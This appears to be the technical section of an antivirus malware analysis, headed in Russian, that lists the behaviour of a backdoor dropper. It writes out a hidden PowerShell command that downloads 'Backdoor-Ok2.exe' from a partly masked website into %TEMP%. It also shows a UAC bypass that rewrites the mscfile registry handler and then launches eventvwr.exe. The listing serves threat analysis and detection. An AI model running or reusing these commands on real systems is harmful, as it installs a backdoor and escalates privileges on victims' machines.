Техническая информация
- http://www.da###tran.co.uk/modules/mod_articles_popular/888/backdoor-ok2.exe как %temp%\\dwmx62.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://www.da###tran.co.uk/modules/mod_articles_popular/888/Backdoor-Ok2.exe','%TEMP%\\dwmx62.exe') &...
- %TEMP%\dwmx62.exe
- nul
- 'da###tran.co.uk':80
- http://www.da###tran.co.uk/modules/mod_articles_popular/888/Backdoor-Ok2.exe
- DNS ASK da###tran.co.uk
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://www.da###tran.co.uk/modules/mod_articles_popular/888/Backdoor-Ok2.exe','%TEMP%\\dwmx62.exe') &...' (со скрытым окном)
- '<SYSTEM32>\mmc.exe' "<SYSTEM32>\eventvwr.msc"' (со скрытым окном)
- '<SYSTEM32>\reg.exe' add HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /d %TEMP%\\dwmx62.exe /f
- '<SYSTEM32>\eventvwr.exe'
- '<SYSTEM32>\mmc.exe' "<SYSTEM32>\eventvwr.msc"
- '<SYSTEM32>\ping.exe' -n 15 127.0.0.1